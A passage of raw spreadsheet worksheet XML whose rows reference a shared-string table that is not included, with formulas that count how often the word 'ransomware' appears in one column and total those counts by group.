    <col customWidth="1" min="7" max="7" width="17.63"/>
    <col customWidth="1" min="8" max="8" width="18.38"/>
    <col customWidth="1" min="9" max="9" width="20.5"/>
    <col customWidth="1" min="10" max="10" width="19.5"/>
    <col customWidth="1" min="11" max="11" width="34.88"/>
    <col customWidth="1" min="13" max="13" width="20.25"/>
    <col customWidth="1" min="15" max="15" width="18.75"/>
    <col customWidth="1" min="17" max="17" width="26.88"/>
    <col customWidth="1" min="18" max="18" width="27.63"/>
    <col customWidth="1" min="19" max="19" width="26.5"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="1" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="1" t="s">
        <v>5</v>
      </c>
      <c r="G1" s="1" t="s">
        <v>6</v>
      </c>
      <c r="H1" s="1" t="s">
        <v>7</v>
      </c>
      <c r="I1" s="1" t="s">
        <v>8</v>
      </c>
      <c r="J1" s="1" t="s">
        <v>9</v>
      </c>
      <c r="K1" s="2" t="s">
        <v>10</v>
      </c>
      <c r="L1" s="1" t="s">
        <v>11</v>
      </c>
      <c r="M1" s="1" t="s">
        <v>12</v>
      </c>
      <c r="N1" s="1" t="s">
        <v>13</v>
      </c>
      <c r="O1" s="1" t="s">
        <v>14</v>
      </c>
      <c r="P1" s="1" t="s">
        <v>15</v>
      </c>
      <c r="Q1" s="2" t="s">
        <v>16</v>
      </c>
      <c r="R1" s="2" t="s">
        <v>17</v>
      </c>
      <c r="S1" s="2" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="2">
      <c r="A2" s="1">
        <v>1.0</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>19</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D2" s="2" t="s">
        <v>21</v>
      </c>
      <c r="E2" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F2" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G2" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H2" s="1" t="s">
        <v>24</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>26</v>
      </c>
      <c r="K2" s="2" t="s">
        <v>27</v>
      </c>
      <c r="L2" s="1">
        <v>3.0</v>
      </c>
      <c r="M2" s="1">
        <v>5.0</v>
      </c>
      <c r="N2" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O2" s="1" t="s">
        <v>29</v>
      </c>
      <c r="P2" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q2" s="1">
        <f t="shared" ref="Q2:Q1280" si="1">COUNTIFS($J$2:$J$1280,"="&amp;J2,$B$2:$B$1280,"*ransomware*")</f>
        <v>1</v>
      </c>
      <c r="R2" s="2">
        <f t="shared" ref="R2:R1280" si="2">(LEN(B2)-LEN(SUBSTITUTE(B2,"ransomware","")))/LEN("ransomware")</f>
        <v>1</v>
      </c>
      <c r="S2" s="1">
        <f t="shared" ref="S2:S1280" si="3">SUMIF($J$2:$J$1280,"="&amp;J2,$R$2:$R$1280)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="1">
        <v>5.0</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>31</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>21</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F3" s="1" t="s">
        <v>32</v>
      </c>
      <c r="G3" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H3" s="1" t="s">
        <v>33</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J3" s="1" t="s">
        <v>35</v>
      </c>
      <c r="K3" s="2" t="s">
        <v>36</v>
      </c>
      <c r="L3" s="1">
        <v>7.0</v>
      </c>
      <c r="M3" s="1">
        <v>13.0</v>
      </c>
      <c r="N3" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O3" s="1" t="s">
        <v>38</v>
      </c>
      <c r="P3" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q3" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R3" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S3" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="1">
        <v>19.0</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>40</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>41</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F4" s="1" t="s">
        <v>43</v>
      </c>
      <c r="G4" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H4" s="1" t="s">
        <v>44</v>
      </c>
      <c r="I4" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J4" s="1" t="s">
        <v>45</v>
      </c>
      <c r="K4" s="2" t="s">
        <v>46</v>
      </c>
      <c r="L4" s="1">
        <v>4.0</v>
      </c>
      <c r="M4" s="1">
        <v>8.0</v>
      </c>
      <c r="N4" s="1" t="s">
        <v>47</v>
      </c>
      <c r="O4" s="1" t="s">
        <v>48</v>
      </c>
      <c r="P4" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q4" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R4" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S4" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="1">
        <v>26.0</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>49</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>50</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F5" s="1" t="s">
        <v>52</v>
      </c>
      <c r="G5" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H5" s="1" t="s">
        <v>53</v>
      </c>
      <c r="I5" s="1" t="s">
        <v>54</v>
      </c>
      <c r="J5" s="1" t="s">
        <v>55</v>
      </c>
      <c r="K5" s="2" t="s">
        <v>56</v>
      </c>
      <c r="L5" s="1">
        <v>5.0</v>
      </c>
      <c r="M5" s="1">
        <v>5.0</v>
      </c>
      <c r="N5" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O5" s="1" t="s">
        <v>57</v>
      </c>
      <c r="P5" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q5" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R5" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S5" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="1">
        <v>31.0</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>58</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D6" s="2" t="s">
        <v>59</v>
      </c>
      <c r="E6" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F6" s="1" t="s">
        <v>61</v>
      </c>
      <c r="G6" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H6" s="1" t="s">
        <v>62</v>
      </c>
      <c r="I6" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J6" s="1" t="s">
        <v>63</v>
      </c>
      <c r="K6" s="2" t="s">
        <v>64</v>
      </c>
      <c r="L6" s="1">
        <v>7.0</v>
      </c>
      <c r="M6" s="1">
        <v>9.0</v>
      </c>
      <c r="N6" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O6" s="1" t="s">
        <v>65</v>
      </c>
      <c r="P6" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q6" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R6" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S6" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="1">
        <v>34.0</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>67</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>68</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>69</v>
      </c>
      <c r="G7" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H7" s="1" t="s">
        <v>70</v>
      </c>
      <c r="I7" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J7" s="1" t="s">
        <v>63</v>
      </c>
      <c r="K7" s="2" t="s">
        <v>64</v>
      </c>
      <c r="L7" s="1">
        <v>7.0</v>
      </c>
      <c r="M7" s="1">
        <v>9.0</v>
      </c>
      <c r="N7" s="1" t="s">
        <v>71</v>
      </c>
      <c r="O7" s="1" t="s">
        <v>65</v>
      </c>
      <c r="P7" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q7" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R7" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S7" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="1">
        <v>35.0</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>72</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D8" s="2" t="s">
        <v>68</v>
      </c>
      <c r="E8" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F8" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G8" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H8" s="1" t="s">
        <v>74</v>
      </c>
      <c r="I8" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J8" s="1" t="s">
        <v>63</v>
      </c>
      <c r="K8" s="2" t="s">
        <v>64</v>
      </c>
      <c r="L8" s="1">
        <v>7.0</v>
      </c>
      <c r="M8" s="1">
        <v>9.0</v>
      </c>
      <c r="N8" s="1" t="s">
        <v>75</v>
      </c>
      <c r="O8" s="1" t="s">
        <v>65</v>
      </c>
      <c r="P8" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q8" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R8" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S8" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="1">
        <v>36.0</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>76</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D9" s="2" t="s">
        <v>68</v>
      </c>
      <c r="E9" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F9" s="1" t="s">
        <v>73</v>
      </c>
      <c r="G9" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H9" s="1" t="s">
        <v>77</v>
      </c>
      <c r="I9" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J9" s="1" t="s">
        <v>63</v>
      </c>
      <c r="K9" s="2" t="s">
        <v>64</v>
      </c>
      <c r="L9" s="1">
        <v>7.0</v>
      </c>
      <c r="M9" s="1">
        <v>9.0</v>
      </c>
      <c r="N9" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O9" s="1" t="s">
        <v>65</v>
      </c>
      <c r="P9" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q9" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R9" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S9" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="1">
        <v>40.0</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>79</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D10" s="2" t="s">
        <v>80</v>
      </c>
      <c r="E10" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F10" s="1" t="s">
        <v>82</v>
      </c>
      <c r="G10" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H10" s="1" t="s">
        <v>83</v>
      </c>
      <c r="I10" s="1" t="s">
        <v>34</v>
      </c>
      <c r="J10" s="1" t="s">
        <v>84</v>
      </c>
      <c r="K10" s="2" t="s">
        <v>85</v>
      </c>
      <c r="L10" s="1">
        <v>8.0</v>
      </c>
      <c r="M10" s="1">
        <v>11.0</v>
      </c>
      <c r="N10" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O10" s="1" t="s">
        <v>86</v>
      </c>
      <c r="P10" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q10" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R10" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S10" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="1">
        <v>78.0</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>87</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D11" s="2" t="s">
        <v>88</v>
      </c>
      <c r="E11" s="2" t="s">
        <v>89</v>
      </c>
      <c r="F11" s="1" t="s">
        <v>90</v>
      </c>
      <c r="G11" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H11" s="1" t="s">
        <v>91</v>
      </c>
      <c r="I11" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J11" s="1" t="s">
        <v>93</v>
      </c>
      <c r="K11" s="2" t="s">
        <v>94</v>
      </c>
      <c r="L11" s="1">
        <v>3.0</v>
      </c>
      <c r="M11" s="1">
        <v>3.0</v>
      </c>
      <c r="N11" s="1" t="s">
        <v>95</v>
      </c>
      <c r="O11" s="1" t="s">
        <v>96</v>
      </c>
      <c r="P11" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q11" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R11" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S11" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="1">
        <v>79.0</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>97</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D12" s="2" t="s">
        <v>98</v>
      </c>
      <c r="E12" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F12" s="1" t="s">
        <v>100</v>
      </c>
      <c r="G12" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H12" s="1" t="s">
        <v>101</v>
      </c>
      <c r="I12" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J12" s="1" t="s">
        <v>102</v>
      </c>
      <c r="K12" s="2" t="s">
        <v>103</v>
      </c>
      <c r="L12" s="1">
        <v>3.0</v>
      </c>
      <c r="M12" s="1">
        <v>3.0</v>
      </c>
      <c r="N12" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O12" s="1" t="s">
        <v>104</v>
      </c>
      <c r="P12" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q12" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R12" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S12" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="1">
        <v>80.0</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>105</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D13" s="2" t="s">
        <v>106</v>
      </c>
      <c r="E13" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F13" s="1" t="s">
        <v>107</v>
      </c>
      <c r="G13" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H13" s="1" t="s">
        <v>108</v>
      </c>
      <c r="I13" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J13" s="1" t="s">
        <v>102</v>
      </c>
      <c r="K13" s="2" t="s">
        <v>103</v>
      </c>
      <c r="L13" s="1">
        <v>3.0</v>
      </c>
      <c r="M13" s="1">
        <v>3.0</v>
      </c>
      <c r="N13" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O13" s="1" t="s">
        <v>104</v>
      </c>
      <c r="P13" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q13" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R13" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S13" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="1">
        <v>82.0</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>109</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D14" s="2" t="s">
        <v>110</v>
      </c>
      <c r="E14" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F14" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G14" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H14" s="1" t="s">
        <v>113</v>
      </c>
      <c r="I14" s="1" t="s">
        <v>114</v>
      </c>
      <c r="J14" s="1" t="s">
        <v>115</v>
      </c>
      <c r="K14" s="2" t="s">
        <v>116</v>
      </c>
      <c r="L14" s="1">
        <v>2.0</v>
      </c>
      <c r="M14" s="1">
        <v>3.0</v>
      </c>
      <c r="N14" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O14" s="1" t="s">
        <v>117</v>
      </c>
      <c r="P14" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q14" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R14" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S14" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="1">
        <v>83.0</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>118</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D15" s="2" t="s">
        <v>110</v>
      </c>
      <c r="E15" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F15" s="1" t="s">
        <v>119</v>
      </c>
      <c r="G15" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H15" s="1" t="s">
        <v>120</v>
      </c>
      <c r="I15" s="1" t="s">
        <v>114</v>
      </c>
      <c r="J15" s="1" t="s">
        <v>115</v>
      </c>
      <c r="K15" s="2" t="s">
        <v>116</v>
      </c>
      <c r="L15" s="1">
        <v>2.0</v>
      </c>
      <c r="M15" s="1">
        <v>3.0</v>
      </c>
      <c r="N15" s="1" t="s">
        <v>121</v>
      </c>
      <c r="O15" s="1" t="s">
        <v>117</v>
      </c>
      <c r="P15" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q15" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R15" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S15" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="1">
        <v>85.0</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>122</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D16" s="2" t="s">
        <v>123</v>
      </c>
      <c r="E16" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F16" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G16" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H16" s="1" t="s">
        <v>125</v>
      </c>
      <c r="I16" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J16" s="1" t="s">
        <v>126</v>
      </c>
      <c r="K16" s="2" t="s">
        <v>127</v>
      </c>
      <c r="L16" s="1">
        <v>5.0</v>
      </c>
      <c r="M16" s="1">
        <v>8.0</v>
      </c>
      <c r="N16" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O16" s="1" t="s">
        <v>128</v>
      </c>
      <c r="P16" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q16" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R16" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S16" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="1">
        <v>86.0</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>129</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D17" s="2" t="s">
        <v>123</v>
      </c>
      <c r="E17" s="2" t="s">
        <v>124</v>
      </c>
      <c r="F17" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G17" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H17" s="1" t="s">
        <v>130</v>
      </c>
      <c r="I17" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J17" s="1" t="s">
        <v>131</v>
      </c>
      <c r="K17" s="2" t="s">
        <v>127</v>
      </c>
      <c r="L17" s="1">
        <v>1.0</v>
      </c>
      <c r="M17" s="1">
        <v>1.0</v>
      </c>
      <c r="N17" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O17" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P17" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q17" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R17" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S17" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="1">
        <v>88.0</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>133</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D18" s="2" t="s">
        <v>134</v>
      </c>
      <c r="E18" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F18" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G18" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H18" s="1" t="s">
        <v>136</v>
      </c>
      <c r="I18" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J18" s="1" t="s">
        <v>126</v>
      </c>
      <c r="K18" s="2" t="s">
        <v>127</v>
      </c>
      <c r="L18" s="1">
        <v>5.0</v>
      </c>
      <c r="M18" s="1">
        <v>8.0</v>
      </c>
      <c r="N18" s="1" t="s">
        <v>137</v>
      </c>
      <c r="O18" s="1" t="s">
        <v>128</v>
      </c>
      <c r="P18" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q18" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R18" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S18" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="1">
        <v>91.0</v>
      </c>
      <c r="B19" s="2" t="s">
        <v>138</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D19" s="2" t="s">
        <v>139</v>
      </c>
      <c r="E19" s="2" t="s">
        <v>135</v>
      </c>
      <c r="F19" s="1" t="s">
        <v>140</v>
      </c>
      <c r="G19" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H19" s="1" t="s">
        <v>141</v>
      </c>
      <c r="I19" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J19" s="1" t="s">
        <v>126</v>
      </c>
      <c r="K19" s="2" t="s">
        <v>127</v>
      </c>
      <c r="L19" s="1">
        <v>5.0</v>
      </c>
      <c r="M19" s="1">
        <v>8.0</v>
      </c>
      <c r="N19" s="1" t="s">
        <v>142</v>
      </c>
      <c r="O19" s="1" t="s">
        <v>128</v>
      </c>
      <c r="P19" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q19" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R19" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S19" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="1">
        <v>141.0</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>143</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D20" s="2" t="s">
        <v>144</v>
      </c>
      <c r="E20" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F20" s="1" t="s">
        <v>145</v>
      </c>
      <c r="G20" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H20" s="4">
        <v>44261.15833333333</v>
      </c>
      <c r="I20" s="1" t="s">
        <v>146</v>
      </c>
      <c r="J20" s="1" t="s">
        <v>147</v>
      </c>
      <c r="K20" s="2" t="s">
        <v>148</v>
      </c>
      <c r="L20" s="1">
        <v>7.0</v>
      </c>
      <c r="M20" s="1">
        <v>18.0</v>
      </c>
      <c r="N20" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O20" s="1" t="s">
        <v>150</v>
      </c>
      <c r="P20" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q20" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R20" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S20" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="1">
        <v>148.0</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>151</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D21" s="2" t="s">
        <v>152</v>
      </c>
      <c r="E21" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F21" s="1" t="s">
        <v>153</v>
      </c>
      <c r="G21" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H21" s="4">
        <v>43679.18402777778</v>
      </c>
      <c r="I21" s="1" t="s">
        <v>154</v>
      </c>
      <c r="J21" s="1" t="s">
        <v>155</v>
      </c>
      <c r="K21" s="2" t="s">
        <v>156</v>
      </c>
      <c r="L21" s="1">
        <v>1.0</v>
      </c>
      <c r="M21" s="1">
        <v>1.0</v>
      </c>
      <c r="N21" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O21" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P21" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q21" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R21" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S21" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="1">
        <v>176.0</v>
      </c>
      <c r="B22" s="2" t="s">
        <v>157</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D22" s="2" t="s">
        <v>158</v>
      </c>
      <c r="E22" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F22" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G22" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H22" s="1" t="s">
        <v>160</v>
      </c>
      <c r="I22" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J22" s="1" t="s">
        <v>162</v>
      </c>
      <c r="K22" s="2" t="s">
        <v>163</v>
      </c>
      <c r="L22" s="1">
        <v>1.0</v>
      </c>
      <c r="M22" s="1">
        <v>1.0</v>
      </c>
      <c r="N22" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O22" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P22" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q22" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R22" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S22" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="1">
        <v>203.0</v>
      </c>
      <c r="B23" s="2" t="s">
        <v>164</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D23" s="2" t="s">
        <v>165</v>
      </c>
      <c r="E23" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F23" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G23" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H23" s="1" t="s">
        <v>166</v>
      </c>
      <c r="I23" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J23" s="1" t="s">
        <v>167</v>
      </c>
      <c r="K23" s="2" t="s">
        <v>168</v>
      </c>
      <c r="L23" s="1">
        <v>1.0</v>
      </c>
      <c r="M23" s="1">
        <v>1.0</v>
      </c>
      <c r="N23" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O23" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P23" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q23" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R23" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S23" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="1">
        <v>204.0</v>
      </c>
      <c r="B24" s="2" t="s">
        <v>164</v>
      </c>
      <c r="C24" s="1" t="s">
